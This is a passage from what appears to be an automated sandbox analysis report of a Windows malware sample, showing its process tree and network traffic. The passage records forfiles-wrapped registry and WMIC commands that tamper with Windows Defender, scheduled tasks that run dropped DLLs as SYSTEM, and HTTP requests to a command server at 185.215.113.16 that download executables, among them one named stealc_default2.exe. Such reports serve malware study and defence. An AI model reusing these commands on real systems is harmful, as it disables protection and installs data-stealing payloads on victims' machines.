                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                        6⤵
                                                                                                                          PID:2608
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                      4⤵
                                                                                                                      • Indirect Command Execution
                                                                                                                      PID:684
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                        5⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2336
                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                          6⤵
                                                                                                                            PID:2548
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                        4⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        PID:2524
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                          5⤵
                                                                                                                            PID:2508
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                              6⤵
                                                                                                                                PID:2260
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                            4⤵
                                                                                                                            • Indirect Command Execution
                                                                                                                            PID:2976
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                              5⤵
                                                                                                                                PID:2788
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  6⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2572
                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                    7⤵
                                                                                                                                      PID:832
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "bmbXFarNlpbNUcjZUs"
                                                                                                                              3⤵
                                                                                                                                PID:2168
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                3⤵
                                                                                                                                  PID:2560
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                    4⤵
                                                                                                                                    • Indirect Command Execution
                                                                                                                                    PID:1528
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                      5⤵
                                                                                                                                        PID:1868
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                          6⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2020
                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                            7⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:1604
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                      4⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1468
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:796
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                          6⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:756
                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                            7⤵
                                                                                                                                              PID:1032
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kVyftiaSU\QwjSJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HlGMqKYvccXUYlk" /V1 /F
                                                                                                                                      3⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:1304
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "HlGMqKYvccXUYlk2" /F /xml "C:\Program Files (x86)\kVyftiaSU\SIqgEfJ.xml" /RU "SYSTEM"
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:2904
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /END /TN "HlGMqKYvccXUYlk"
                                                                                                                                      3⤵
                                                                                                                                        PID:2392
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "HlGMqKYvccXUYlk"
                                                                                                                                        3⤵
                                                                                                                                          PID:892
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "jcvlsaWlukqsKE" /F /xml "C:\Program Files (x86)\vECSWYHhNEBU2\MMtAEvz.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1552
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "DNmCZKMScDllc2" /F /xml "C:\ProgramData\NUEAEvpmbtRdsZVB\zHFWLzh.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2512
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "SebvePPLQQlbTkynf2" /F /xml "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR\vMxVtgP.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:796
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "BvByqijJTTwWPkViWve2" /F /xml "C:\Program Files (x86)\EKfHLQOzikZzC\agSfxQf.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1252
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "hjqxuCHRKqyyPIyfi" /SC once /ST 03:37:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll\",#1 /kdidGeF 385121" /V1 /F
                                                                                                                                          3⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2848
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "hjqxuCHRKqyyPIyfi"
                                                                                                                                          3⤵
                                                                                                                                            PID:1616
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "cszbzSIAjSjUwyOsr"
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2256
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 1548
                                                                                                                                            3⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Program crash
                                                                                                                                            PID:1876
                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll",#1 /kdidGeF 385121
                                                                                                                                          2⤵
                                                                                                                                            PID:2244
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll",#1 /kdidGeF 385121
                                                                                                                                              3⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:1512
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "hjqxuCHRKqyyPIyfi"
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1492
                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                          1⤵
                                                                                                                                            PID:2180
                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                            1⤵
                                                                                                                                              PID:2432
                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                              1⤵
                                                                                                                                                PID:2488

                                                                                                                                              Network

                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:39 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/crypteda.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/crypteda.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:39 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 1165824
                                                                                                                                                Last-Modified: Thu, 12 Sep 2024 13:56:33 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e2f311-11ca00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:40 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/stealc_default2.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/stealc_default2.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 192000
                                                                                                                                                Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66c9f4f9-2ee00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:43 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:57 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:00 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/penis.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/penis.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:00 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 506368
                                                                                                                                                Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e099a7-7ba00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:02 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/bundle.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/bundle.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:02 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 311296
                                                                                                                                                Last-Modified: Fri, 06 Sep 2024 02:12:34 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66da6512-4c000"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:03 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/dobre/acentric.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /dobre/acentric.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:03 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 464896
                                                                                                                                                Last-Modified: Sat, 07 Sep 2024 22:52:49 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66dcd941-71800"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:04 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/2.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/2.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:05 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 689664
                                                                                                                                                Last-Modified: Mon, 05 Aug 2024 00:09:39 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66b01843-a8600"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:06 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/dobre/splwow64.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /dobre/splwow64.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:06 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 1381143
                                                                                                                                                Last-Modified: Fri, 13 Sep 2024 12:59:12 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e43720-151317"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:08 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
